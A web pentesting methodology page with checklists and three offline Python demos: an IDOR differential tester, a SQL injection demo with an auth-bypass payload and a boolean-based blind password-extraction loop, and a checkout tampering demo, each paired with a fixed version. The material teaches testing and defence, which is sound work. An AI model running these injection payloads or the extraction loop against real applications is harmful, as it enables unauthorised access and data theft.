# Master assessment mindmaps

## Web Application Pentesting Mindmap

Key areas to assess during web application security testing:

### Reconnaissance

* Subdomain enumeration
* Technology fingerprinting
* Hidden content discovery
* API endpoint mapping

### Authentication Testing

* Brute force protection
* Password policies
* Session management
* Multi-factor authentication bypass
* Account lockout mechanisms

### Authorization Testing

* Horizontal privilege escalation: insecure direct object references (IDOR), one user reading or modifying another user's objects by changing an identifier
* Vertical privilege escalation: a low-privilege user reaching admin-only functionality
* Function-level access control: privileged endpoints that rely on the UI hiding them rather than a server-side check
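The horizontal check above is easiest to run as a differential test: collect object ids while browsing as one user, then replay each request with a second user's session and flag the ids that come back identical. The script below is an added example written for this page, not code from pentest-book.com; the two endpoint implementations and the sample objects are constructed so it runs offline, and for a live target `fetch` would be replaced by a function that sends the request with the given user's session cookie and returns `(status, body)`.

```python
"""Differential check for horizontal privilege escalation (IDOR).

Added example for this page, not code from pentest-book.com. Two in-memory
endpoint implementations (constructed here) stand in for a real API so the
script runs offline; for a live target, replace `fetch` with a function that
issues the request with the given user's session cookie and returns
(status, body).
"""
from typing import Callable, List, Tuple

Fetch = Callable[[str, int], Tuple[int, str]]

# Constructed sample data: object id -> owner and contents.
OBJECTS = {
    101: {"owner": "alice", "body": "alice's invoice"},
    102: {"owner": "alice", "body": "alice's address"},
    201: {"owner": "bob", "body": "bob's invoice"},
}
KNOWN_USERS = {"alice", "bob"}


def vulnerable_fetch(session_user: str, object_id: int) -> Tuple[int, str]:
    """Authenticates the session but never checks who owns the object."""
    if session_user not in KNOWN_USERS:
        return 401, ""
    obj = OBJECTS.get(object_id)
    if obj is None:
        return 404, ""
    return 200, obj["body"]


def hardened_fetch(session_user: str, object_id: int) -> Tuple[int, str]:
    """Same endpoint with an ownership check on every access."""
    if session_user not in KNOWN_USERS:
        return 401, ""
    obj = OBJECTS.get(object_id)
    # 404 for both "missing" and "not yours" so the attacker cannot confirm ids exist.
    if obj is None or obj["owner"] != session_user:
        return 404, ""
    return 200, obj["body"]


def find_idor(fetch: Fetch, victim: str, attacker: str, victim_ids: List[int]) -> List[int]:
    """Return the victim-owned ids the attacker's session can also read.

    victim_ids are ids collected while browsing as the victim. An id is flagged
    only when the victim really gets 200 on it and the attacker gets 200 with the
    same body; comparing bodies rules out generic 200 error pages and shared
    objects that render differently per user.
    """
    leaked = []
    for oid in victim_ids:
        v_status, v_body = fetch(victim, oid)
        if v_status != 200:
            continue
        a_status, a_body = fetch(attacker, oid)
        if a_status == 200 and a_body == v_body:
            leaked.append(oid)
    return leaked


if __name__ == "__main__":
    alice_ids = [101, 102]
    print("vulnerable endpoint leaks:", find_idor(vulnerable_fetch, "alice", "bob", alice_ids))
    print("hardened endpoint leaks:  ", find_idor(hardened_fetch, "alice", "bob", alice_ids))
```

Comparing full bodies rather than status codes alone matters on real applications, where a missing permission often yields a 200 with a redirect or an error template rather than a 403.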

### Input Validation

* SQL Injection (in-band/error-based, boolean-based blind, time-based blind, out-of-band)
* XSS (Reflected, Stored, DOM)
* Command Injection
* SSRF
* CSRF
* XXE Injection
* Template Injection (SSTI)
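To make the SQL injection item concrete, the following added example (written for this page, not the page's own code) puts a string-built login query beside its parameterised fix and then runs a boolean-based blind extraction against the vulnerable version, the technique used when the application only reveals "login succeeded or not". The in-memory SQLite database and its two users are constructed so the script runs offline.

```python
"""SQL injection: a string-built login query next to its parameterised fix, plus
a boolean-based blind extraction run against the vulnerable version.

Added example for this page, not the page's own code. It uses an in-memory
SQLite database with two constructed users so it runs offline; the pattern is
the same for any DB-API driver.
"""
import sqlite3
import string
from typing import Callable


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Interpolates user input into the SQL text, so input can rewrite the query."""
    query = (
        "SELECT id FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values are bound separately and never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def blind_extract(oracle: Callable[[str, str], bool], target_user: str, max_len: int = 32) -> str:
    """Boolean-based blind SQLi: recover target_user's password one character at a time.

    The oracle only answers whether login succeeded; each payload makes the
    WHERE clause true exactly when the guessed character matches. Stops when no
    candidate matches at a position (end of value) or the oracle is not injectable.
    """
    recovered = ""
    alphabet = string.ascii_letters + string.digits
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                f"x' OR (SELECT substr(password, {pos}, 1) FROM users "
                f"WHERE username = '{target_user}') = '{ch}' -- "
            )
            if oracle(payload, "irrelevant"):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass on vulnerable:", login_vulnerable(db, "alice' -- ", "wrong"))
    print("bypass on safe:      ", login_safe(db, "alice' -- ", "wrong"))
    print("blind extract:       ", blind_extract(lambda u, p: login_vulnerable(db, u, p), "alice"))
```

The same `blind_extract` loop, with the oracle swapped for a time-based condition or an HTTP response check, is the core of any blind injection tool; the fix is always the parameterised form, never escaping.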

### Business Logic

* Workflow bypass
* Price manipulation
* Quantity tampering
* Feature abuse
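Price manipulation and quantity tampering both come down to the server trusting fields the client controls. The added example below (written for this page, not the page's own code) shows a checkout total computed straight from the request beside one that recomputes from a server-side catalog and validates quantities; the catalog, the tampered cart and the legitimate cart are constructed inline so it runs offline.

```python
"""Business-logic checks at checkout: price manipulation and quantity tampering.

Added example for this page, not the page's own code. The catalog and the cart
payloads are constructed inline so it runs offline; a real handler would load
the catalog from the database and the cart from the request body.
"""
from decimal import Decimal
from typing import Dict, List, Tuple, Union

# Constructed server-side catalog: the only source of truth for prices.
CATALOG: Dict[str, Decimal] = {"sku-1": Decimal("49.99"), "sku-2": Decimal("5.00")}
MAX_QTY = 100

# Client payload as an attacker would send it: a rewritten unit price on one
# line and a negative quantity on another, turning the order into a credit.
TAMPERED_CART = [
    {"sku": "sku-1", "quantity": 1, "unit_price": "0.01"},
    {"sku": "sku-2", "quantity": -10, "unit_price": "5.00"},
]
LEGIT_CART = [
    {"sku": "sku-1", "quantity": 1, "unit_price": "49.99"},
    {"sku": "sku-2", "quantity": 2, "unit_price": "5.00"},
]


def total_vulnerable(cart: List[dict]) -> Decimal:
    """Trusts unit_price and quantity exactly as the client sent them."""
    return sum((Decimal(item["unit_price"]) * item["quantity"] for item in cart), Decimal("0"))


def checkout_hardened(cart: List[dict]) -> Tuple[bool, Union[Decimal, str]]:
    """Recompute the total from the catalog and validate every quantity.

    Returns (True, total) or (False, reason). The client's unit_price field is
    ignored entirely rather than validated, so there is nothing to get wrong.
    """
    if not cart:
        return False, "empty cart"
    total = Decimal("0")
    for item in cart:
        sku = item.get("sku")
        if sku not in CATALOG:
            return False, f"unknown sku {sku!r}"
        qty = item.get("quantity")
        # bool is a subclass of int, so exclude it explicitly before the range check.
        if isinstance(qty, bool) or not isinstance(qty, int) or not 1 <= qty <= MAX_QTY:
            return False, f"invalid quantity {qty!r} for {sku}"
        total += CATALOG[sku] * qty
    return True, total


if __name__ == "__main__":
    print("vulnerable total for tampered cart:", total_vulnerable(TAMPERED_CART))
    print("hardened result for tampered cart: ", checkout_hardened(TAMPERED_CART))
    print("hardened result for legit cart:    ", checkout_hardened(LEGIT_CART))
```

When testing, send each of the tampered fields separately as well as together: an application may recompute the price but still accept a negative or zero quantity, and a coupon or shipping calculation downstream of the total is often where the remaining logic flaw sits.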

### Infrastructure

* Server misconfigurations
* Default credentials
* Exposed admin panels
* Information disclosure

![](/files/-MG33dIgvN3YUZUMnKCs)

## Bug Bounty Methodology

![](https://blog.it-securityguard.com/pbbt.png)

## Comprehensive Pentest Methodology

### Phase 1: Information Gathering

1. Passive reconnaissance (OSINT)
2. Active scanning and enumeration
3. Vulnerability identification

### Phase 2: Exploitation

1. Vulnerability validation
2. Exploit development/selection
3. Initial access

### Phase 3: Post-Exploitation

1. Privilege escalation
2. Persistence
3. Lateral movement
4. Data exfiltration

### Phase 4: Reporting

1. Finding documentation
2. Risk assessment
3. Remediation recommendations

![](/files/-MB8iKf1-S8141P3waGS)

## Additional Resources

* [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
* [PortSwigger Web Security Academy](https://portswigger.net/web-security)
* [HackTricks](https://book.hacktricks.xyz/)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

